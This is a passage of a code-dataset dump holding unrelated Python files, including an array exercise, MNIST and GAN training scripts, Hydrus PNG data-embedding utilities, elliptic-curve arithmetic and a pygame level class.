progress\n","repo_name":"scottessner/multi-machine-ripper","sub_path":"mmr/actors/transcoder.py","file_name":"transcoder.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15970950431","text":"# Задача 3\n# В массиве случайных целых чисел поменять местами минимальный и максимальный элементы.\n# Блок-схема - https://drive.google.com/file/d/1EVjfVBiV0WAgJ0KhTbFDs31skxbVVBoe/view?usp=sharing\n\nfrom random import randint\n\nmy_mssv = [randint(0, 100) for i in range(10)]\nprint('Исходный массив:', my_mssv)\n\nmn = 0\nmx = 0\nmax_el = my_mssv[0]\nmin_el = my_mssv[0]\n\nfor i in my_mssv:\n\n if i > max_el:\n max_el = i\n mx = my_mssv.index(i)\n\n elif i < min_el:\n min_el = i\n mn = my_mssv.index(i)\n\nmy_mssv[mx], my_mssv[mn] = my_mssv[mn], my_mssv[mx]\n\nprint('Максимальный элемент -', max_el, '\\nМинимальный элемент -', min_el)\nprint('Массив с переставленными max и min элементами', my_mssv)\n\n\n\n","repo_name":"cappuccino23/PyAlgorithms","sub_path":"Lesson 3/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12653930225","text":"#_*_coding:utf8_*_\nimport cv2\nimport numpy as np\nimport os\nfrom neural_network import nn\n\n# 运行前请解压dataset.zip得到training_img和test_img\ndef get_training_data(dataset_dir):\n images = []\n labels = []\n train_dir = os.path.join(dataset_dir, \"train\")\n files = os.listdir(train_dir) #获取训练数据列表\n np.random.shuffle(files)\n for f in files: #读取每一张图片,并加入到样本中\n img_path = os.path.join(train_dir, f)\n img = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) #以灰度图的格式读取\n img = img.flatten() #默认读取的是32 * 32, 展开成1024维\n images.append(img) #样本加入list中\n num = int(f[0]) #文件名的第一个字符就是标签,这里需要转成int型, 例如8_001.jpg是数字8\n label = np.zeros(10)\n label[num] = 1 #标签是以one-hot方式存放的,举���[0,0,1,0,0,0,0,0,0,0]代表2\n labels.append(label) #图片对应标签也加入到list\n return (np.float32(images), np.float32(labels)) #转换为numpy 的数组用于训练\n\nimages, labels = get_training_data(\"dataset\") #获取训练数据\nnet = nn(1024, 16, 10) \nnet.train(images, labels)\nnet.save(\"mnist.npy\")\n","repo_name":"xiaowei305/perception","sub_path":"ch1/nn_mnist/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"20870239231","text":"import ClientConstants as CC\nimport ClientImageHandling\nimport ClientImporting\nimport ClientParsing\nimport cv2\nimport HydrusConstants as HC\nimport HydrusData\nimport HydrusPaths\nimport HydrusSerialisable\nimport numpy\nimport os\nimport shutil\nimport struct\nimport wx\n\nif cv2.__version__.startswith( '2' ):\n \n IMREAD_UNCHANGED = cv2.CV_LOAD_IMAGE_UNCHANGED\n \nelse:\n \n IMREAD_UNCHANGED = cv2.IMREAD_UNCHANGED\n \n\npng_font = cv2.FONT_HERSHEY_TRIPLEX\ngreyscale_text_color = 0\n\ntitle_size = 0.7\npayload_description_size = 0.5\ntext_size = 0.4\n\ndef CreateTopImage( width, title, payload_description, text ):\n \n text_extent_bmp = wx.Bitmap( 20, 20, 24 )\n \n dc = wx.MemoryDC( text_extent_bmp )\n \n text_font = wx.SystemSettings.GetFont( wx.SYS_DEFAULT_GUI_FONT )\n \n basic_font_size = text_font.GetPointSize()\n \n payload_description_font = wx.SystemSettings.GetFont( wx.SYS_DEFAULT_GUI_FONT )\n \n payload_description_font.SetPointSize( int( basic_font_size * 1.4 ) )\n \n title_font = wx.SystemSettings.GetFont( wx.SYS_DEFAULT_GUI_FONT )\n \n title_font.SetPointSize( int( basic_font_size * 2.0 ) )\n \n dc.SetFont( text_font )\n ( gumpf, text_line_height ) = dc.GetTextExtent( 'abcdefghijklmnopqrstuvwxyz' )\n \n dc.SetFont( payload_description_font )\n ( gumpf, payload_description_line_height ) = dc.GetTextExtent( 'abcdefghijklmnopqrstuvwxyz' )\n \n dc.SetFont( title_font )\n ( gumpf, title_line_height ) = dc.GetTextExtent( 'abcdefghijklmnopqrstuvwxyz' )\n \n del dc\n del text_extent_bmp\n \n text_lines = WrapText( text, width, text_size, 1 )\n \n if len( text_lines ) == 0:\n \n text_total_height = 0\n \n else:\n \n text_total_height = ( text_line_height + 4 ) * len( text_lines )\n \n text_total_height += 6 # to bring the last 4 padding up to 10 padding\n \n \n top_height = 10 + title_line_height + 10 + payload_description_line_height + 10 + text_total_height\n \n #\n \n top_bmp = wx.Bitmap( width, top_height, 24 )\n \n dc = wx.MemoryDC( top_bmp )\n \n dc.SetBackground( wx.Brush( wx.WHITE ) )\n \n dc.Clear()\n \n #\n \n dc.DrawBitmap( CC.GlobalBMPs.file_repository, width - 16 - 5, 5 )\n \n #\n \n current_y = 10\n \n dc.SetFont( title_font )\n \n ( t_width, t_height ) = dc.GetTextExtent( title )\n \n dc.DrawText( title, ( width - t_width ) / 2, current_y )\n \n current_y += t_height + 10\n \n dc.SetFont( payload_description_font )\n \n ( t_width, t_height ) = dc.GetTextExtent( payload_description )\n \n dc.DrawText( payload_description, ( width - t_width ) / 2, current_y )\n \n current_y += t_height + 10\n \n dc.SetFont( text_font )\n \n for text_line in text_lines:\n \n ( t_width, t_height ) = dc.GetTextExtent( text_line )\n \n dc.DrawText( text_line, ( width - t_width ) / 2, current_y )\n \n current_y += t_height + 4\n \n \n del dc\n \n data = top_bmp.ConvertToImage().GetData()\n \n data = buffer( data ) # wx phoenix thing--bmp now delivers a bytearray, but numpy wants a buffer, wew\n \n top_image_rgb = numpy.fromstring( data, dtype = 'uint8' ).reshape( ( top_height, width, 3 ) )\n \n top_bmp.Destroy()\n \n top_image = cv2.cvtColor( top_image_rgb, cv2.COLOR_RGB2GRAY )\n \n top_height_header = struct.pack( '!H', top_height )\n \n ( byte0, byte1 ) = top_height_header\n \n top_image[0][0] = ord( byte0 )\n top_image[0][1] = ord( byte1 )\n \n return top_image\n \ndef DumpToPng( width, payload, title, payload_description, text, path ):\n \n payload_length = len( payload )\n \n payload_string_length = payload_length + 4\n \n payload_height = int( float( payload_string_length ) / width )\n \n if float( payload_string_length ) / width % 1.0 > 0:\n \n payload_height += 1\n \n \n top_image = CreateTopImage( width, title, payload_description, text )\n \n payload_length_header = struct.pack( '!I', payload_length )\n \n num_empty_bytes = payload_height * width - payload_string_length\n \n full_payload_string = payload_length_header + payload + '\\x00' * num_empty_bytes\n \n payload_image = numpy.fromstring( full_payload_string, dtype = 'uint8' ).reshape( ( payload_height, width ) )\n \n finished_image = numpy.concatenate( ( top_image, payload_image ) )\n \n # this is to deal with unicode paths, which cv2 can't handle\n ( os_file_handle, temp_path ) = HydrusPaths.GetTempPath( suffix = '.png' )\n \n try:\n \n cv2.imwrite( temp_path, finished_image, [ cv2.IMWRITE_PNG_COMPRESSION, 9 ] )\n \n shutil.copy2( temp_path, path )\n \n except Exception as e:\n \n HydrusData.ShowException( e )\n \n raise Exception( 'Could not save the png!' )\n \n finally:\n \n HydrusPaths.CleanUpTempPath( os_file_handle, temp_path )\n \n \ndef GetPayloadString( payload_obj ):\n \n if isinstance( payload_obj, ( str, unicode ) ):\n \n return HydrusData.ToByteString( payload_obj )\n \n else:\n \n return payload_obj.DumpToNetworkString()\n \n \ndef GetPayloadTypeString( payload_obj ):\n \n if isinstance( payload_obj, ( str, unicode ) ):\n \n return 'String'\n \n elif isinstance( payload_obj, HydrusSerialisable.SerialisableList ):\n \n return 'A list of ' + HydrusData.ConvertIntToPrettyString( len( payload_obj ) ) + ' ' + GetPayloadTypeString( payload_obj[0] )\n \n elif isinstance( payload_obj, HydrusSerialisable.SerialisableBase ):\n \n return payload_obj.SERIALISABLE_NAME\n \n else:\n \n return repr( type( payload_obj ) )\n \n \ndef GetPayloadDescriptionAndString( payload_obj ):\n \n payload_string = GetPayloadString( payload_obj )\n \n payload_description = GetPayloadTypeString( payload_obj ) + ' - ' + HydrusData.ConvertIntToBytes( len( payload_string ) )\n \n return ( payload_description, payload_string )\n \ndef LoadFromPng( path ):\n \n # this is to deal with unicode paths, which cv2 can't handle\n ( os_file_handle, temp_path ) = HydrusPaths.GetTempPath()\n \n try:\n \n shutil.copy2( path, temp_path )\n \n numpy_image = cv2.imread( temp_path, flags = IMREAD_UNCHANGED )\n \n except Exception as e:\n \n HydrusData.ShowException( e )\n \n raise Exception( 'That did not appear to be a valid image!' )\n \n finally:\n \n HydrusPaths.CleanUpTempPath( os_file_handle, temp_path )\n \n \n try:\n \n ( height, width ) = numpy_image.shape\n \n complete_data = numpy_image.tostring()\n \n top_height_header = complete_data[:2]\n \n ( top_height, ) = struct.unpack( '!H', top_height_header )\n \n full_payload_string = complete_data[ width * top_height : ]\n \n payload_length_header = full_payload_string[:4]\n \n ( payload_length, ) = struct.unpack( '!I', payload_length_header )\n \n payload = full_payload_string[ 4 : 4 + payload_length ]\n \n except Exception as e:\n \n HydrusData.ShowException( e )\n \n raise Exception( 'The image was fine, but it did not seem to have hydrus data encoded in it!' )\n \n \n return payload\n \ndef TextExceedsWidth( text, width, size, thickness ):\n \n ( ( tw, th ), baseline ) = cv2.getTextSize( text, png_font, size, thickness )\n \n return tw > width\n \ndef WrapText( text, width, size, thickness ):\n \n words = text.split( ' ' )\n \n lines = []\n \n next_line = []\n \n for word in words:\n \n if word == '':\n \n continue\n \n \n potential_next_line = list( next_line )\n \n potential_next_line.append( word )\n \n if TextExceedsWidth( ' '.join( potential_next_line ), width, size, thickness ):\n \n if len( potential_next_line ) == 1: # one very long word\n \n lines.append( ' '.join( potential_next_line ) )\n \n next_line = []\n \n else:\n \n lines.append( ' '.join( next_line ) )\n \n next_line = [ word ]\n \n \n else:\n \n next_line = potential_next_line\n \n \n \n if len( next_line ) > 0:\n \n lines.append( ' '.join( next_line ) )\n \n \n return lines\n \n","repo_name":"Xaegrek/hydrus","sub_path":"include/ClientSerialisable.py","file_name":"ClientSerialisable.py","file_ext":"py","file_size_in_byte":8723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"9795008981","text":"#!/usr/bin/env python3\nfrom monte_carlo import *\nfrom monte_carlo_numba import *\n\nif __name__ == \"__main__\":\n print(\"Ищем интеграл функции сos(x) на [0,pi/2]\")\n print(\"c помощью формул с матанализа понимаем, что он равен 1\")\n N = 100000000\n t0 = time.time()\n print(\"Считаем по-простому\")\n cos_integral_val = cos_integral(N)\n print(\n f\"{cos_integral_val} - значение ,посчитали за {time.time() - t0} сек\"\n )\n print(\"Считаем с nubma\")\n t0 = time.time()\n cos_integral_jit_val = cos_integral_jit(N)\n print(\n f\"{cos_integral_jit_val} - значение ,посчитали за {time.time() - t0} сек\"\n )\n\n","repo_name":"AlexanderTitilin/spbau_python","sub_path":"monte_carlo_numba/bench.py","file_name":"bench.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38366174080","text":"\nfrom django.test import TestCase\n\nfrom product.factories import CategoryFactory, ProductFactory\nfrom product.serializers import CategorySerializer\n\n\nclass TestCategorySerializer(TestCase):\n def setUp(self) -> None:\n self.category = CategoryFactory(title=\"food\")\n self.category_serializer = CategorySerializer(self.category)\n\n def test_order_serializer(self):\n serializer_data = self.category_serializer.data\n\n self.assertEquals(serializer_data[\"title\"], \"food\")\n","repo_name":"fxbrartur/djangorest","sub_path":"product/tests/test_serializers/test_category_serializer.py","file_name":"test_category_serializer.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"1936833069","text":"import math\n\n\ndef is_prime(n):\n \"\"\"\n from an answer\n # https://stackoverflow.com/questions/18833759/python-prime-number-checker\n # bruteforce check\n \"\"\"\n if n <= 2:\n return True\n if n % 2 == 0:\n return False\n return all(n % i for i in range(3, int(math.sqrt(n)) + 1, 2))\n\n# from an answer\n# https://stackoverflow.com/questions/31074172/elliptic-curve-point-addition-over-a-finite-field-in-python\n\n\nclass ECMPoint(object):\n O = POINT_INFINITY = \"inf\"\n\n def __init__(self, x: int, y: int, ec: 'EllipticCurveModulo'):\n self.x = x\n self.y = y\n self.ec = ec\n\n def __mul__(self, mult: int):\n # dumb mult\n result = self.ec.point(self.x, self.y)\n for i in range(mult):\n result = self.ec.ec_add(result, self)\n return result\n\n def __add__(self, p: 'ECMPoint'):\n return self.ec.ec_add(self, p)\n\n def __sub__(self, p: 'ECMPoint'):\n return self.ec.ec_add(self, self.ec.ec_inv(p))\n\n def __invert__(self):\n return self.ec.ec_inv(self)\n\n def __repr__(self):\n return \"ECMPoint({}, {})\".format(self.x, self.y)\n\n def __eq__(self, p: 'ECMPoint'):\n return p is not None and p != ECMPoint.O and self.x == p.x and self.y == p.y and self.ec == p.ec\n\n def __hash__(self):\n return hash((self.x, self.y))\n\n\n# elliptic curve like y^2 = x^3 + a*x + b\nclass EllipticCurveModulo(object):\n class FullPointIter(object):\n def __init__(self, ec: 'EllipticCurveModulo'):\n self.x = 0 # type: int\n self.ec = ec\n self.make_inverse = False\n self.point_cache = None # type: ECMPoint\n self.squares_y = dict([(y**2 % ec._mod, y) for y in range(int(ec._mod/2 + 1))])\n\n def next(self) -> ECMPoint:\n while self.x < self.ec._mod:\n not_ok = True\n if self.make_inverse:\n self.x += 1\n if self.point_cache.y != 0:\n not_ok = False\n self.point_cache.y = -self.point_cache.y % self.ec._mod\n else:\n while not_ok:\n y = self.squares_y.get(self.ec.eval_x(self.x))\n if y is None:\n self.x += 1\n else:\n not_ok = False\n self.point_cache = self.ec.point(self.x, y)\n self.make_inverse = not self.make_inverse\n if not not_ok:\n return self.ec.point(self.point_cache.x, self.point_cache.y)\n raise StopIteration()\n\n def __iter__(self):\n return self\n\n def __next__(self):\n return self.next()\n\n class PointIter(object):\n def __init__(self, gen_point: ECMPoint, ec: 'EllipticCurveModulo'):\n self.gen_point = gen_point\n self.inter_point = None # type: ECMPoint\n self.ec = ec\n self.max_gen = 1\n\n def next(self) -> ECMPoint:\n if self.inter_point != ECMPoint.O:\n if self.inter_point is not None:\n self.inter_point = self.gen_point + self.inter_point\n else:\n self.inter_point = self.ec.point(self.gen_point.x, self.gen_point.y)\n return self.inter_point if self.inter_point == ECMPoint.O else self.ec.point(self.inter_point.x, self.inter_point.y)\n else:\n raise StopIteration()\n\n def __iter__(self):\n return self\n\n # Python 3 compatibility\n def __next__(self):\n return self.next()\n\n def __init__(self, a: int, b: int, mod: int):\n self._mod = mod\n self._a = a\n self._b = b\n self.__size__ = None # type: int\n\n def old_point_begin(self) -> 'PointIter':\n for x in range(0, self._mod):\n try:\n p = self.eval(x)\n return EllipticCurveModulo.PointIter(p, self)\n except ValueError:\n pass\n\n def point_begin(self) -> 'FullPointIter':\n return EllipticCurveModulo.FullPointIter(self)\n\n def eval_x(self, x: int) -> int:\n x = x % self._mod\n return (x ** 3 + self._a * x + self._b) % self._mod\n\n def eval(self, x) -> ECMPoint:\n y_square = self.eval_x(x)\n # find a square root by brute force\n for y in range(self._mod):\n if y**2 % self._mod == y_square:\n return self.point(x, y)\n raise ValueError(\"given x cannot evaluate a point (no square root from {} modulo {})\".format(y_square, self._mod))\n\n def check(self, crypto_check: bool = True, raise_error=True) -> bool:\n if self._mod <= 2:\n if raise_error:\n raise ValueError(\"_mod value '{}' is incorrect (<=2)!\".format(self._mod))\n return False\n if not is_prime(self._mod):\n if raise_error:\n raise ValueError(\"_mod value '{}' is incorrect (not prime)!\".format(self._mod))\n return False\n if crypto_check and ((4*self._a**3 % self._mod) + (27*self._b**2 % self._mod) % self._mod) % self._mod == 0:\n if raise_error:\n raise ValueError(\"EC is singular: 4*a^3 + 27*b^2 is zero mod p (crypto check) \"\n \"with a={},b={},p={}\".format(self._a, self._b, self._mod))\n return False\n return True\n\n def valid(self, p: ECMPoint):\n \"\"\"\n Determine whether we have a valid representation of a point\n on our curve. We assume that the x and y coordinates\n are always reduced modulo p, so that we can compare\n two points for equality with a simple ==.\n \"\"\"\n if p == ECMPoint.O:\n return True\n elif p.ec != self:\n return False\n else:\n return ((p.y ** 2 - (p.x ** 3 + self._a * p.x + self._b)) % self._mod == 0 and\n 0 <= p.x < self._mod and 0 <= p.y < self._mod)\n\n def point(self, x, y) -> ECMPoint:\n return ECMPoint(x, y, self)\n\n @property\n def size(self) -> int:\n if self.__size__ is None:\n self.__size__ = sum(1 for _ in self.point_begin()) # type: int\n return self.__size__\n\n def size_hasse_check(self) -> bool:\n s = self.size\n return abs(s - self._mod - 1) < 2*math.sqrt(self._mod)\n\n def inv_mod(self, x):\n \"\"\"\n Compute an inverse for x modulo p, assuming that x\n is not divisible by p.\n \"\"\"\n if x % self._mod == 0:\n raise ZeroDivisionError(\"Impossible inverse\")\n # three-args pow - ( x^p-2 mod p )\n # if mod is prime - result is always an inverse (because x^(p-1) = 1 mod p)\n return pow(x, self._mod-2, self._mod)\n\n def ec_inv(self, p: ECMPoint, check=True) -> ECMPoint:\n \"\"\"\n Inverse of the point P on the elliptic curve y^2 = x^3 + ax + b.\n \"\"\"\n if check and not self.valid(p):\n raise ValueError(\"Point '{}' is invalid\".format(p))\n if p == ECMPoint.O:\n return p\n return ECMPoint(p.x, (-p.y) % self._mod, self)\n\n def ec_add(self, p: ECMPoint, q: ECMPoint, check=True):\n \"\"\"\n Sum of the points P and Q on the elliptic curve y^2 = x^3 + ax + b.\n \"\"\"\n if check and not self.valid(p):\n raise ValueError(\"Point '{}' is invalid\".format(p))\n\n # Deal with the special cases where either P, Q, or P + Q is\n # the origin.\n if p == ECMPoint.O:\n result = q\n elif q == ECMPoint.O:\n result = p\n elif q == self.ec_inv(p, check=False):\n result = ECMPoint.O\n else:\n # Cases not involving the origin.\n if p == q:\n dydx = (3 * p.x ** 2 + self._a) * self.inv_mod(2 * p.y)\n else:\n dydx = (q.y - p.y) * self.inv_mod(q.x - p.x)\n\n x = int((dydx ** 2 - p.x - q.x) % self._mod)\n y = int((dydx * (p.x - x) - p.y) % self._mod)\n result = ECMPoint(x, y, self)\n\n # The above computations *should* have given us another point\n # on the curve.\n assert self.valid(result)\n return result\n\n def __repr__(self):\n return \"EllipticCurveModulo({}, {}, {}) =\" \\\n \" 'y^2 = x^3 + {}x + {} mod {}'\".format(*((self._a, self._b, self._mod)*2))\n\n","repo_name":"FakeEmperor/elliptic-curve-math","sub_path":"kily/math/ec/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3115720190","text":"import torch\nimport torch.nn as nn\nfrom torchvision import datasets\nfrom torchvision import transforms\nfrom torch.autograd import Variable\nfrom torchvision.utils import save_image\nfrom tqdm import tqdm\n\nbatch_size = 64\nnoise_size = 100\ntotal_epoch = 100\n\n\ndef to_var(x):\n if torch.cuda.is_available():\n x = x.cuda()\n return Variable(x)\n\n\ndef get_noise(x_size):\n return torch.randn(x_size, noise_size)\n\n\n# Image processing\ntransform = transforms.Compose([\n transforms.Grayscale(),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n])\n\n# MNIST dataset\nmnist = datasets.MNIST(root='/tmp/',\n train=True,\n transform=transform,\n download=True)\n# Data loader\ndata_loader = torch.utils.data.DataLoader(dataset=mnist,\n batch_size=batch_size,\n shuffle=True)\n\nD = nn.Sequential(\n nn.Linear(784, 512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(512, 256),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(256, 1),\n nn.Sigmoid()\n)\n\n\ndef g_layer(in_size, out_size, normalize=True):\n layers = [nn.Linear(in_size, out_size)]\n\n if normalize:\n layers.append(nn.BatchNorm1d(out_size, 0.8))\n\n layers.append(nn.LeakyReLU(0.2, inplace=True))\n\n return layers\n\n\nG = nn.Sequential(\n *g_layer(noise_size, 128, normalize=False),\n *g_layer(128, 256),\n *g_layer(256, 512),\n *g_layer(512, 1024),\n nn.Linear(1024, 784),\n nn.Tanh()\n)\n\nbce_loss = nn.BCELoss()\nd_optimizer = torch.optim.Adam(D.parameters(), lr=0.0002)\ng_optimizer = torch.optim.Adam(G.parameters(), lr=0.0002)\n\nif torch.cuda.is_available():\n D.cuda()\n G.cuda()\n\nfor epoch in range(total_epoch):\n pbar = tqdm(data_loader)\n pbar.set_description('{}'.format(epoch))\n\n for x, _ in pbar:\n # input data\n curr_batch = x.size(0)\n x = to_var(x)\n x_data = to_var(x.view(curr_batch, -1))\n sample_noise = to_var(get_noise(curr_batch))\n\n # label\n one_label = Variable(torch.ones(x_data.size(0), 1), requires_grad=False).cuda()\n zero_label = Variable(torch.zeros(x_data.size(0), 1), requires_grad=False).cuda()\n\n fake_img = G(sample_noise)\n\n # discriminator\n d_optimizer.zero_grad()\n # g_optimizer.zero_grad()\n\n real_loss = bce_loss(D(x_data), one_label)\n fake_loss = bce_loss(D(fake_img), zero_label)\n\n d_loss = (real_loss + fake_loss) / 2\n\n d_loss.backward(retain_graph=True)\n d_optimizer.step()\n\n # generator\n g_optimizer.zero_grad()\n # d_optimizer.zero_grad()\n\n g_loss = bce_loss(D(fake_img), one_label)\n\n g_loss.backward()\n g_optimizer.step()\n\n fake_images = fake_img.view(fake_img.size(0), 1, 28, 28)\n save_image(fake_images, '{}.png'.format(epoch), normalize=True)\n","repo_name":"yongjun823/style-to-go","sub_path":"gan/gan_pytorch.py","file_name":"gan_pytorch.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10995238564","text":"import pygame # Imports Pygame\n\nfrom decoration import Sky # Imports class Sky\nfrom enemy import Enemy # Imports class Enemy\nfrom game_data import levels # Imports levels dictionary\nfrom player import Player # Import class Player\nfrom settings import tile_size, screen_width, screen_height # Import settings\nfrom support import import_csv_layout, import_cut_graphics # Import functions from support\nfrom tiles import Tile, StaticTile # Imports classes from tiles\n\n\nclass Level: # Class that contains all level information\n def __init__(self, current_level, surface, create_overworld, change_coins, change_health): # Class arguments\n # Level base\n self.background = pygame.image.load('../graphics/terrain/background_0.png')\n self.display_surface = surface\n self.world_shift = 0\n self.current_x = None\n\n #Audio\n self.coin_sound = pygame.mixer.Sound('../audio/effects/coin.wav')\n self.coin_sound.set_volume(0.2)\n self.stomp_sound = pygame.mixer.Sound('../audio/effects/stomp.wav')\n\n # Defines overworld arguments\n self.create_overworld = create_overworld\n self.current_level = current_level\n level_data = levels[self.current_level]\n self.new_max_level = level_data['unlock']\n\n # Player Setup\n player_layout = import_csv_layout(level_data['player'])\n self.player = pygame.sprite.GroupSingle()\n self.goal = pygame.sprite.GroupSingle()\n self.player_setup(player_layout, change_health)\n\n # Terrain setup\n terrain_layout = import_csv_layout(level_data['terrain'])\n self.terrain_sprites = self.create_tile_group(terrain_layout, 'terrain')\n\n #User interface\n self.change_coins = change_coins\n\n # Coin Setup\n coin_layout = import_csv_layout(level_data['coins'])\n self.coin_sprites = self.create_tile_group(coin_layout, 'coins')\n\n # Enemy\n enemy_layout = import_csv_layout(level_data['enemies'])\n self.enemy_sprites = self.create_tile_group(enemy_layout, 'enemies')\n\n # Constraint\n constraint_layout = import_csv_layout(level_data['constraints'])\n self.constraint_sprites = self.create_tile_group(constraint_layout, 'constraints')\n\n # Decoration\n self.sky = Sky(9)\n\n #Time\n current_time = pygame.time.get_ticks()\n\n def create_tile_group(self, layout, type): # Creates the tile logic in game\n sprite_group = pygame.sprite.Group()\n\n for row_index, row in enumerate(layout):\n for col_index, val in enumerate(row):\n if val != '-1': # If csv number is -1\n x = col_index * tile_size\n y = row_index * tile_size # Creates blank space\n\n if type == 'terrain': # If CSV data is type 'terrain'\n terrain_tile_list = import_cut_graphics('../graphics/terrain/terrain.png')\n tile_surface = terrain_tile_list[int(val)]\n sprite = StaticTile(tile_size, x, y, tile_surface) # Create tile groupset\n\n if type == 'coins': # If CSV data type is 'coins'\n coin_tile_list = import_cut_graphics('../graphics/coins/diamond_1.png')\n coin_surface = coin_tile_list[int(val)]\n sprite = StaticTile(tile_size, x, y, coin_surface) # Create coin tile groupset\n\n if type == 'enemies': # If CSV data type is 'enemies'\n sprite = Enemy(tile_size, x, y) # Render sprite and borrow arguments from Class Enemy\n\n if type == 'constraints': # If CSV data type is ;constraints'\n sprite = Tile(tile_size, x, y) # Same logic as enemy\n\n sprite_group.add(sprite) # Adds sprites\n\n return sprite_group # Evaluates sprite group\n\n\n def player_setup(self, layout, change_health):\n for row_index, row in enumerate(layout):\n for col_index, val in enumerate(row):\n x = col_index * tile_size\n y = row_index * tile_size\n if val == '0':\n sprite = Player((x, y), self.display_surface, change_health)\n self.player.add(sprite)\n\n if val == '1':\n start_surface = pygame.image.load('../graphics/character/character_start_tile.png').convert_alpha()\n sprite = StaticTile(tile_size, x, y, start_surface)\n self.goal.add(sprite)\n\n def enemy_collision_reverse(self):\n for enemy in self.enemy_sprites.sprites():\n if pygame.sprite.spritecollide(enemy, self.constraint_sprites, False):\n enemy.reverse()\n\n def horizontal_movement_collision(self):\n player = self.player.sprite\n player.collision_rect.x += player.direction.x * player.speed\n collidable_sprites = self.terrain_sprites.sprites\n\n for sprite in collidable_sprites():\n if sprite.rect.colliderect(player.collision_rect):\n if player.direction.x < 0:\n player.collision_rect.left = sprite.rect.right\n player.on_left = True\n self.current_x = player.rect.left\n elif player.direction.x > 0:\n player.collision_rect.right = sprite.rect.left\n player.on_right = True\n self.current_x = player.rect.right\n\n\n def vertical_movement_collision(self):\n player = self.player.sprite\n player.apply_gravity()\n collidable_sprites = self.terrain_sprites.sprites\n\n for sprite in collidable_sprites():\n if sprite.rect.colliderect(player.collision_rect):\n if player.direction.y > 0:\n player.collision_rect.bottom = sprite.rect.top\n player.direction.y = 0\n player.on_ground = True\n elif player.direction.y < 0:\n player.collision_rect.top = sprite.rect.bottom\n player.direction.y = 0\n player.on_ceiling = True\n\n if player.on_ground and player.direction.y < 0 or player.direction.y > 1:\n player.on_ground = False\n\n def scroll_x(self):\n player = self.player.sprite\n player_x = player.rect.centerx\n direction_x = player.direction.x\n\n if player_x < screen_width / 4 and direction_x < 0:\n self.world_shift = 4\n player.speed = 0\n elif player_x > screen_width - (screen_width / 4) and direction_x > 0:\n self.world_shift = -4\n player.speed = 0\n else:\n self.world_shift = 0\n player.speed = 4\n\n def check_death(self):\n if self.player.sprite.rect.top > screen_height:\n self.create_overworld(self.current_level, 0)\n\n def check_win(self):\n if pygame.sprite.spritecollide(self.player.sprite, self.goal, False):\n self.create_overworld(self.current_level, self.new_max_level)\n\n def check_coin_collisions(self):\n collided_coins = pygame.sprite.spritecollide(self.player.sprite, self.coin_sprites, True)\n if collided_coins:\n self.coin_sound.play()\n for coin in collided_coins:\n self.change_coins(1)\n\n def check_enemy_collisions(self):\n enemy_collisions = pygame.sprite.spritecollide(self.player.sprite, self.enemy_sprites, False)\n\n if enemy_collisions:\n for enemy in enemy_collisions:\n enemy_center = enemy.rect.centery\n enemy_top = enemy.rect.top\n player_bottom = self.player.sprite.rect.bottom\n if enemy_top < player_bottom < enemy_center and self.player.sprite.direction.y >= 0:\n self.stomp_sound.play()\n self.player.sprite.direction.y = -7\n enemy.kill()\n else:\n self.player.sprite.get_damage()\n\n def timer(self):\n font = pygame.font.Font('../graphics/ui/MinimalPixel v2.ttf', 50)\n current_time = pygame.time.get_ticks()\n time_surf = font.render(current_time, False, (64, 64, 64))\n time_rect = time_surf.get_rect(center=(600, 1000))\n\n\n\n def run(self): # Runs the level\n\n # decoration\n self.sky.draw(self.display_surface)\n\n # Terrain\n self.terrain_sprites.update(self.world_shift)\n self.terrain_sprites.draw(self.display_surface)\n\n # Coins\n self.coin_sprites.update(self.world_shift)\n self.coin_sprites.draw(self.display_surface)\n\n # Enemy\n self.enemy_sprites.update(self.world_shift)\n self.constraint_sprites.update(self.world_shift)\n self.enemy_collision_reverse()\n self.enemy_sprites.draw(self.display_surface)\n\n # Player Sprites\n self.player.update()\n self.horizontal_movement_collision()\n self.vertical_movement_collision()\n self.scroll_x()\n\n self.check_death()\n self.check_win()\n\n self.check_coin_collisions()\n self.check_enemy_collisions()\n\n self.player.draw(self.display_surface)\n self.goal.update(self.world_shift)\n self.goal.draw(self.display_surface)\n","repo_name":"l1menz/FALAKPLATFORMERPROJECTARYAN","sub_path":"code/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":9321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31740475558","text":"import matplotlib.pyplot as plt\nimport sys\nimport numpy as np\nimport math as m\nimport os\n\ndef addsubgraph(figshape, which, t, q1, q2, lab):\n\tplt.subplot2grid(figshape,which)\n\tplt.plot(t,q2,'r', label='test')\n\tplt.plot(t,q1,'b', label='train')\n\tplt.xlabel('epoch')\n\tplt.ylabel(lab)\n\tplt.grid(color='k', linestyle=':', linewidth=1)\n\tplt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc='lower left', ncol=2, mode=\"expand\", borderaxespad=0.)\n\t\t \ndef display_results(a1, a2, e1, e2, waitForGraph=False, tr_H = None, tr_Y = None, te_H = None, te_Y = None, epoch = 0, dirname = './'):\n figure = plt.figure(num='Progress of training', figsize = (15,12) if tr_H is None else (25,12))\n plt.clf()\n\n figshape = (2,2) if tr_H is None else (2,4)\n t = range(len(a1))\n 